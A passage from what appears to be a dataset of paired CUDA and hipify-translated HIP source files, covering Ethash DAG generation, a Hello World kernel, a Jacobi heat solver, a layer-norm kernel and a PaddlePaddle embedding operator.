sizeof(hash64_t)); const uint32_t run = gridSize * blockSize; uint32_t base; for (base = 0; base <= work - run; base += run) { ethash_calculate_dag_item <<<gridSize, blockSize, 0, stream>>>(base); CUDA_SAFE_CALL(cudaDeviceSynchronize()); } if (base < work) { uint32_t lastGrid = work - base; lastGrid = (lastGrid + blockSize - 1) / blockSize; ethash_calculate_dag_item <<<lastGrid, blockSize, 0, stream>>>(base); CUDA_SAFE_CALL(cudaDeviceSynchronize()); } CUDA_SAFE_CALL(cudaGetLastError()); } #endif __host__ void ethash_generate_dag_part( uint64_t start, uint32_t gridSize, uint32_t blockSize, cudaStream_t stream ) { ethash_calculate_dag_item <<<gridSize, blockSize, 0, stream>>>(start); CUDA_SAFE_CALL(cudaStreamSynchronize(stream)); } __host__ void set_constants( hash128_t* _dag, uint32_t _dag_size, hash64_t * _light, uint32_t _light_size ) { CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_dag, &_dag, sizeof(hash128_t *))); CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_dag_size, &_dag_size, sizeof(uint32_t))); CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_light, &_light, sizeof(hash64_t *))); CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_light_size, &_light_size, sizeof(uint32_t))); } __host__ void set_header( hash32_t _header ) { CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_header, &_header, sizeof(hash32_t))); } __host__ void set_target( uint64_t _target ) { CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_target, &_target, sizeof(uint64_t))); }
c45ade100722a3fbb2e0403ba88bdeefcabe9288.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> __global__ void kernel() {} int main (){ hipLaunchKernelGGL(( kernel), dim3(1),dim3(1), 0, 0, ); printf("Hello, World!\n"); return 0; }
c45ade100722a3fbb2e0403ba88bdeefcabe9288.cu
#include <stdio.h> __global__ void kernel() {} int main (){ kernel<<<1,1>>>(); printf("Hello, World!\n"); return 0; }
9520a711c0456826bb8879f6babfd71c24685511.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <stdint.h> #include <string.h> #include <math.h> void Print_matrix(int N, FILE *f, double *m, long int n); __global__ void Jacobi(long int n, double *in, double *out); int main(void) { int N = 128; int block = 1024; int grid = N * N / 1024; double *heat = (double *) calloc(sizeof(double), N * N), *arr, *arr_out; hipMalloc(&arr, sizeof(double) * N * N); hipMalloc(&arr_out, sizeof(double) * N * N); hipMemcpy(arr, heat, sizeof(double) * N * N, hipMemcpyHostToDevice); dim3 Block(block); dim3 Grid(grid); int k_iter = 0; for (int i = 0; i < N; i++) { heat[N * i] = 1; } FILE *f = fopen("heat.txt", "wb"); for(;;) { k_iter++; hipLaunchKernelGGL(( Jacobi), dim3(Grid), dim3(Block), 0, 0, N, arr, arr_out); hipMemcpy(heat, arr, sizeof(double)*N*N, hipMemcpyDeviceToHost); Print_matrix(N, f, heat, N); if (k_iter >= 200) { break; } } hipDeviceSynchronize(); fclose(f); free(heat); hipFree(arr); hipFree(arr_out); } __global__ void Jacobi(long int n, double *in, double *out) { int myId, i, j; int north, south, east, west; //double N, S, E, W; int index_center; //int flag = 0; myId = threadIdx.x + blockDim.x * blockIdx.x; i = myId / n; j = myId - n * i; index_center = i*n + j; south = j - 1 > 0 ? (j - 1) + i*n : 0; west = i - 1 > 0 ? j + (i - 1)*n : -1; north = j + 1 < n - 1 ? (j + 1) + i*n : -1; east = i + 1 < n - 1 ? j + (i + 1)*n : -1; //in[0] = 0; //if (j < 1) {S = 0;} else {S = in[(int)south];} //if (j > n - 2) {N = 0;} else {N = in[(int)north];} //if (i > n - 2) {E = 0;} else {E = in[(int)east];} //if (i < 1) {W = 0;} else {W = in[(int)west];} // if (i < n - 1 && j < n - 1 && i>0 && j>0) // { out[index_center] = 0.25 * (in[(int)north] + in[(int)south] + in[(int)east] + in[(int)west]); /* out[index_center] = 0.25 * (S+ N + E + W); */ // } //__syncthreads(); if (i == 0) { out[index_center] = 0; } if (i == n - 1) { out[index_center] = 0; } if (j == n - 1) { out[index_center] = 0; } // __syncthreads(); if (j == 0) { out[index_center - j] = 1; } __syncthreads(); in[index_center] = out[index_center]; } void Print_matrix(int N, FILE *f, double *m, long int n) { for (int i = 0; i < n; i++) { for (int j = 0; j < n; j++) { fprintf(f, "%f\t", m[i*N + j]); } } fprintf(f, "\n"); }
9520a711c0456826bb8879f6babfd71c24685511.cu
#include <stdio.h> #include <stdint.h> #include <string.h> #include <math.h> void Print_matrix(int N, FILE *f, double *m, long int n); __global__ void Jacobi(long int n, double *in, double *out); int main(void) { int N = 128; int block = 1024; int grid = N * N / 1024; double *heat = (double *) calloc(sizeof(double), N * N), *arr, *arr_out; cudaMalloc(&arr, sizeof(double) * N * N); cudaMalloc(&arr_out, sizeof(double) * N * N); cudaMemcpy(arr, heat, sizeof(double) * N * N, cudaMemcpyHostToDevice); dim3 Block(block); dim3 Grid(grid); int k_iter = 0; for (int i = 0; i < N; i++) { heat[N * i] = 1; } FILE *f = fopen("heat.txt", "wb"); for(;;) { k_iter++; Jacobi<<<Grid, Block>>>(N, arr, arr_out); cudaMemcpy(heat, arr, sizeof(double)*N*N, cudaMemcpyDeviceToHost); Print_matrix(N, f, heat, N); if (k_iter >= 200) { break; } } cudaDeviceSynchronize(); fclose(f); free(heat); cudaFree(arr); cudaFree(arr_out); } __global__ void Jacobi(long int n, double *in, double *out) { int myId, i, j; int north, south, east, west; //double N, S, E, W; int index_center; //int flag = 0; myId = threadIdx.x + blockDim.x * blockIdx.x; i = myId / n; j = myId - n * i; index_center = i*n + j; south = j - 1 > 0 ? (j - 1) + i*n : 0; west = i - 1 > 0 ? j + (i - 1)*n : -1; north = j + 1 < n - 1 ? (j + 1) + i*n : -1; east = i + 1 < n - 1 ? j + (i + 1)*n : -1; //in[0] = 0; //if (j < 1) {S = 0;} else {S = in[(int)south];} //if (j > n - 2) {N = 0;} else {N = in[(int)north];} //if (i > n - 2) {E = 0;} else {E = in[(int)east];} //if (i < 1) {W = 0;} else {W = in[(int)west];} // if (i < n - 1 && j < n - 1 && i>0 && j>0) // { out[index_center] = 0.25 * (in[(int)north] + in[(int)south] + in[(int)east] + in[(int)west]); /* out[index_center] = 0.25 * (S+ N + E + W); */ // } //__syncthreads(); if (i == 0) { out[index_center] = 0; } if (i == n - 1) { out[index_center] = 0; } if (j == n - 1) { out[index_center] = 0; } // __syncthreads(); if (j == 0) { out[index_center - j] = 1; } __syncthreads(); in[index_center] = out[index_center]; } void Print_matrix(int N, FILE *f, double *m, long int n) { for (int i = 0; i < n; i++) { for (int j = 0; j < n; j++) { fprintf(f, "%f\t", m[i*N + j]); } } fprintf(f, "\n"); }
2628f677a3046447d6ff56e72dee8f18b7ec371b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "utils.cuh" #include "ln_kernel_traits.h" #include "ATen/hip/HIPContext.h" template <typename Ktraits> __global__ __launch_bounds__(Ktraits::THREADS_PER_CTA) void ln_fwd_kernel( void *__restrict__ y_, void *__restrict__ mu_, void *__restrict__ rsigma_, const void *__restrict__ x_, const void *__restrict__ gamma_, const void *__restrict__ beta_, const float epsilon, int rows) { using Vec = typename Ktraits::Vec; using base_t = typename Ktraits::base_t; using compute_t = typename Ktraits::compute_t; enum { NUM_ELTS = Vec::NUM_ELTS }; enum { WARPS_N = Ktraits::WARPS_N }; enum { WARPS_M = Ktraits::WARPS_M }; enum { ROWS_PER_CTA = Ktraits::ROWS_PER_CTA }; enum { THREADS_PER_ROW = Ktraits::THREADS_PER_ROW }; enum { BYTES_PER_LDG = Ktraits::BYTES_PER_LDG }; static_assert(BYTES_PER_LDG == 16, ""); enum { BYTES_PER_ROW = Ktraits::BYTES_PER_ROW }; enum { LDGS = BYTES_PER_ROW / Ktraits::BYTES_PER_ROW_PER_CTA }; static_assert(LDGS * Ktraits::BYTES_PER_ROW_PER_CTA == BYTES_PER_ROW, ""); const int tidx = threadIdx.x; const int bidx = blockIdx.x; const int lane = tidx % THREADS_PER_WARP; const int warp = tidx / THREADS_PER_WARP; const int warp_n = warp % WARPS_N; const int warp_m = warp / WARPS_N; const int c = warp_n * THREADS_PER_WARP + lane; const int r = bidx * ROWS_PER_CTA + warp_m; const char *x_ptr = static_cast<const char *>(x_); const char *g_ptr = static_cast<const char *>(gamma_); const char *b_ptr = static_cast<const char *>(beta_); char *y_ptr = static_cast<char *>(y_); compute_t *mu_ptr = static_cast<compute_t *>(mu_); compute_t *rs_ptr = static_cast<compute_t *>(rsigma_); Vec gamma[LDGS]; Vec beta[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { gamma[it].load_from(g_ptr + col * BYTES_PER_LDG); beta[it].load_from(b_ptr + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } constexpr compute_t rn = 1.f / compute_t(Ktraits::COLS); for (int row = r; row < rows; row += gridDim.x * ROWS_PER_CTA) { Vec x[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].load_from(x_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } compute_t xf[LDGS * NUM_ELTS]; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { xf[it * NUM_ELTS + jt] = compute_t(x[it].data.elt[jt]); } } compute_t mu_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { mu_local += xf[it * NUM_ELTS + jt]; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { mu_local += __shfl_xor_sync(uint32_t(-1), mu_local, it); } mu_local *= rn; if(lane == 0){ mu_ptr[row] = mu_local; } compute_t var_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { compute_t diff = xf[it * NUM_ELTS + jt] - mu_local; var_local += diff * diff; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { var_local += __shfl_xor_sync(uint32_t(-1), var_local, it); } compute_t rsigma = rsqrtf(var_local * rn + epsilon); if(lane == 0){ rs_ptr[row] = rsigma; } #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { base_t tmp = (rsigma * (xf[it * NUM_ELTS + jt] - mu_local)); x[it].data.elt[jt] = gamma[it].data.elt[jt] * tmp + beta[it].data.elt[jt]; } } #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].store_to(y_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } } } template<typename scalar_t> void launch( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, const int max_gridx, hipStream_t stream ){ if (cols == 2048){ using Ktraits = Kernel_traits<scalar_t, 2048, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 2560){ using Ktraits = Kernel_traits<scalar_t, 2560, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3072){ using Ktraits = Kernel_traits<scalar_t, 3072, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3584){ using Ktraits = Kernel_traits<scalar_t, 3584, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 4096){ using Ktraits = Kernel_traits<scalar_t, 4096, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 1024) { using Ktraits = Kernel_traits<scalar_t, 1024, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 512){ using Ktraits = Kernel_traits<scalar_t, 512, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 256){ using Ktraits = Kernel_traits<scalar_t, 256, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 8192){ using Ktraits = Kernel_traits<scalar_t, 8192, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); hipLaunchKernelGGL(( ln_fwd_kernel<Ktraits>), dim3(grid), dim3(Ktraits::THREADS_PER_CTA), 0, stream, y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else { assert(false && "Not implemented"); } AT_CUDA_CHECK(hipPeekAtLastError()); } void ln_fwd_cuda( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, hipStream_t stream ){ const auto dtype = x.scalar_type(); const auto props = at::cuda::getCurrentDeviceProperties(); const int max_gridx = props->maxGridSize[0]; //TODO // - Using dispatch macro costs 1% perf wtf?!?! // - Tune FP32 warps // - Add more sizes if (dtype == torch::kFloat16) { launch<half>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else if (dtype == torch::kFloat32) { launch<float>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else { assert(false && "Not implemented"); } }
2628f677a3046447d6ff56e72dee8f18b7ec371b.cu
#include "utils.cuh" #include "ln_kernel_traits.h" #include "ATen/cuda/CUDAContext.h" template <typename Ktraits> __global__ __launch_bounds__(Ktraits::THREADS_PER_CTA) void ln_fwd_kernel( void *__restrict__ y_, void *__restrict__ mu_, void *__restrict__ rsigma_, const void *__restrict__ x_, const void *__restrict__ gamma_, const void *__restrict__ beta_, const float epsilon, int rows) { using Vec = typename Ktraits::Vec; using base_t = typename Ktraits::base_t; using compute_t = typename Ktraits::compute_t; enum { NUM_ELTS = Vec::NUM_ELTS }; enum { WARPS_N = Ktraits::WARPS_N }; enum { WARPS_M = Ktraits::WARPS_M }; enum { ROWS_PER_CTA = Ktraits::ROWS_PER_CTA }; enum { THREADS_PER_ROW = Ktraits::THREADS_PER_ROW }; enum { BYTES_PER_LDG = Ktraits::BYTES_PER_LDG }; static_assert(BYTES_PER_LDG == 16, ""); enum { BYTES_PER_ROW = Ktraits::BYTES_PER_ROW }; enum { LDGS = BYTES_PER_ROW / Ktraits::BYTES_PER_ROW_PER_CTA }; static_assert(LDGS * Ktraits::BYTES_PER_ROW_PER_CTA == BYTES_PER_ROW, ""); const int tidx = threadIdx.x; const int bidx = blockIdx.x; const int lane = tidx % THREADS_PER_WARP; const int warp = tidx / THREADS_PER_WARP; const int warp_n = warp % WARPS_N; const int warp_m = warp / WARPS_N; const int c = warp_n * THREADS_PER_WARP + lane; const int r = bidx * ROWS_PER_CTA + warp_m; const char *x_ptr = static_cast<const char *>(x_); const char *g_ptr = static_cast<const char *>(gamma_); const char *b_ptr = static_cast<const char *>(beta_); char *y_ptr = static_cast<char *>(y_); compute_t *mu_ptr = static_cast<compute_t *>(mu_); compute_t *rs_ptr = static_cast<compute_t *>(rsigma_); Vec gamma[LDGS]; Vec beta[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { gamma[it].load_from(g_ptr + col * BYTES_PER_LDG); beta[it].load_from(b_ptr + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } constexpr compute_t rn = 1.f / compute_t(Ktraits::COLS); for (int row = r; row < rows; row += gridDim.x * ROWS_PER_CTA) { Vec x[LDGS]; #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].load_from(x_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } compute_t xf[LDGS * NUM_ELTS]; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { xf[it * NUM_ELTS + jt] = compute_t(x[it].data.elt[jt]); } } compute_t mu_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { mu_local += xf[it * NUM_ELTS + jt]; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { mu_local += __shfl_xor_sync(uint32_t(-1), mu_local, it); } mu_local *= rn; if(lane == 0){ mu_ptr[row] = mu_local; } compute_t var_local = 0.f; #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { compute_t diff = xf[it * NUM_ELTS + jt] - mu_local; var_local += diff * diff; } } #pragma unroll for (int it = 1; it < THREADS_PER_WARP; it *= 2) { var_local += __shfl_xor_sync(uint32_t(-1), var_local, it); } compute_t rsigma = rsqrtf(var_local * rn + epsilon); if(lane == 0){ rs_ptr[row] = rsigma; } #pragma unroll for (int it = 0; it < LDGS; it++) { #pragma unroll for (int jt = 0; jt < NUM_ELTS; jt++) { base_t tmp = (rsigma * (xf[it * NUM_ELTS + jt] - mu_local)); x[it].data.elt[jt] = gamma[it].data.elt[jt] * tmp + beta[it].data.elt[jt]; } } #pragma unroll for (int it = 0, col = c; it < LDGS; it++) { x[it].store_to(y_ptr + row * BYTES_PER_ROW + col * BYTES_PER_LDG); col += THREADS_PER_ROW; } } } template<typename scalar_t> void launch( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, const int max_gridx, cudaStream_t stream ){ if (cols == 2048){ using Ktraits = Kernel_traits<scalar_t, 2048, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 2560){ using Ktraits = Kernel_traits<scalar_t, 2560, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3072){ using Ktraits = Kernel_traits<scalar_t, 3072, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 3584){ using Ktraits = Kernel_traits<scalar_t, 3584, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 4096){ using Ktraits = Kernel_traits<scalar_t, 4096, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 1024) { using Ktraits = Kernel_traits<scalar_t, 1024, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 512){ using Ktraits = Kernel_traits<scalar_t, 512, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 256){ using Ktraits = Kernel_traits<scalar_t, 256, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else if (cols == 8192){ using Ktraits = Kernel_traits<scalar_t, 8192, 4, 1>; const int grid = std::min<int>(DIVUP(rows, Ktraits::ROWS_PER_CTA), max_gridx); ln_fwd_kernel<Ktraits><<<grid, Ktraits::THREADS_PER_CTA, 0, stream>>>( y.data_ptr(), mu.data_ptr(), rsigma.data_ptr(), x.data_ptr(), gamma.data_ptr(), beta.data_ptr(), epsilon, rows); } else { assert(false && "Not implemented"); } AT_CUDA_CHECK(cudaPeekAtLastError()); } void ln_fwd_cuda( at::Tensor & y, // BxSxhidden_size at::Tensor & mu, at::Tensor & rsigma, const at::Tensor & x, // BxSxhidden_size const at::Tensor & gamma, const at::Tensor & beta, const float epsilon, const int rows, const int cols, cudaStream_t stream ){ const auto dtype = x.scalar_type(); const auto props = at::cuda::getCurrentDeviceProperties(); const int max_gridx = props->maxGridSize[0]; //TODO // - Using dispatch macro costs 1% perf wtf?!?! // - Tune FP32 warps // - Add more sizes if (dtype == torch::kFloat16) { launch<half>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else if (dtype == torch::kFloat32) { launch<float>(y, mu, rsigma, x, gamma, beta, epsilon, rows, cols, max_gridx, stream); } else { assert(false && "Not implemented"); } }
efec454fba703ef2971be0167ec081f49e46d00e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #include "paddle/fluid/framework/eigen.h" #include "paddle/fluid/framework/op_registry.h" #include "paddle/fluid/operators/collective/c_embedding_op.h" #include "paddle/fluid/platform/cuda_primitives.h" #include "paddle/fluid/platform/float16.h" namespace paddle { namespace operators { static constexpr int kNumCUDAThreads = 512; static constexpr int kNumMaxinumNumBlocks = 4096; static inline int NumBlocks(const int N) { return ::min((N + kNumCUDAThreads - 1) / kNumCUDAThreads, kNumMaxinumNumBlocks); } template <typename T, typename IndexT> __global__ void CEmbedding(T *out, const T *table, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; PADDLE_ENFORCE(real_idx < N, "The index is out of bounds, " "please check whether the dimensions of index and " "input meet the requirements. It should " "be less than [%d], but received [%d]", N, real_idx); out[i] = table[real_idx * columns + col]; } else { out[i] = static_cast<T>(0); } } } template <typename T, typename IndexT> __global__ void CEmbeddingGrad(T *table, const T *output, const IndexT *ids, const int rows, const int columns, const int64_t N, const int64_t start_idx, const int64_t end_idx, const int64_t limit) { CUDA_KERNEL_LOOP(i, limit) { size_t row = i / columns; size_t col = i % columns; auto id = ids[row]; if (id >= start_idx && id < end_idx) { auto real_idx = id - start_idx; paddle::platform::CudaAtomicAdd(&table[real_idx * columns + col], output[i]); } } } template <typename T> class CEmbeddingCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { auto *table_t = context.Input<LoDTensor>("W"); auto *ids_t = context.Input<LoDTensor>("Ids"); auto *output_t = context.Output<LoDTensor>("Out"); const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); size_t N = table_t->dims()[0]; size_t D = table_t->dims()[1]; size_t K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto *table = table_t->data<T>(); auto *output = output_t->mutable_data<T>(context.GetPlace()); auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { hipLaunchKernelGGL(( CEmbedding<T, int32_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), output, table, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { hipLaunchKernelGGL(( CEmbedding<T, int64_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), output, table, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } else { PADDLE_THROW(platform::errors::Unavailable( "GPU c_embedding ids only support int32 or int64.")); } } }; template <typename T> class CEmbeddingGradCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); auto ids_t = context.Input<LoDTensor>("Ids"); auto d_output_t = context.Input<LoDTensor>(framework::GradVarName("Out")); auto d_table_t = context.Output<LoDTensor>(framework::GradVarName("W")); int N = d_table_t->dims()[0]; int D = d_table_t->dims()[1]; int K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const T *d_output = d_output_t->data<T>(); T *d_table = d_table_t->mutable_data<T>(context.GetPlace()); auto t = framework::EigenVector<T>::Flatten(*d_table_t); t.device(*dev_ctx.eigen_device()) = t.constant(static_cast<T>(0)); const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { hipLaunchKernelGGL(( CEmbeddingGrad<T, int32_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), d_table, d_output, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { hipLaunchKernelGGL(( CEmbeddingGrad<T, int64_t>), dim3(blocks), dim3(threads), 0, dev_ctx.stream(), d_table, d_output, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } } }; } // namespace operators } // namespace paddle namespace ops = paddle::operators; namespace plat = paddle::platform; REGISTER_OP_CUDA_KERNEL(c_embedding, ops::CEmbeddingCUDAKernel<float>, ops::CEmbeddingCUDAKernel<double>, ops::CEmbeddingCUDAKernel<plat::float16>); REGISTER_OP_CUDA_KERNEL(c_embedding_grad, ops::CEmbeddingGradCUDAKernel<float>, ops::CEmbeddingGradCUDAKernel<double>, ops::CEmbeddingGradCUDAKernel<plat::float16>);
